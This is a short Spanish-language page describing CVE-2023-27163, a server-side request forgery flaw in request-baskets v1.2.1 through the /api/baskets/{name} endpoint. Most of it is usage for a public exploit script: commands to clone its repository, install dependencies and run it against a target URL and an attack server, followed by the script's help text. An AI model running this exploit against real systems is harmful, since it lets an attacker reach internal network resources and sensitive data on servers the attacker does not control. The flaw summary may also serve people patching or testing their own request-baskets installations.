
CVE-2023-27163 Request-Baskets v1.2.1 - Falsificación de solicitudes del lado del servidor (SSRF)
Request-Baskets v1.2.1 - falsificación de solicitudes del lado del servidor (SSRF)
Se descubrió que request-baskets hasta v1.2.1 contiene una vulnerabilidad de falsificación de solicitudes del lado del servidor (SSRF) a través del componente /api/baskets/{name}. Esta vulnerabilidad permite a los atacantes acceder a recursos de red e información sensible mediante una solicitud API manipulada.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Script de explotación de Request Baskets
argumentos posicionales:
url ruta principal (/) del servidor (p. ej. http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
opciones:
-h, --help muestra este mensaje de ayuda y sale